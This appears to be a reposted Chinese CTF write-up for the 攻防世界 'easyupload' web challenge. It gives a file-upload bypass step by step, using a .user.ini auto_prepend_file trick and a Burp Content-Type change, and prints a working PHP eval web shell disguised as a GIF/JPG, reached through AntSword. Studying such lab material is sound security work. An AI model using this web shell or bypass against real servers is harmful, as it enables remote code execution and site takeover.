1.新建.user.ini文件,内容如下
GIF89a
auto_prepend_file=a.jpg
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为
Content-Type: image/jpg
3.放包,结果如下
4. 新建a.txt文件,内容为
GIF89a
<?=eval($_REQUEST['cmd']);?>
保存后将文件后缀修改为.jpg
5.直接上传该文件即可成功上传
PS:按F12打开调试器选择网络查看上传文件的地址
如图所示上传地址为:****/uploads/index.php
6.直接蚁剑连接
7.结果如下文章来源:https://www.toymoban.com/news/detail-707791.html
8.查找flag文章来源地址https://www.toymoban.com/news/detail-707791.html
到了这里,关于攻防世界-WEB-easyupload的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!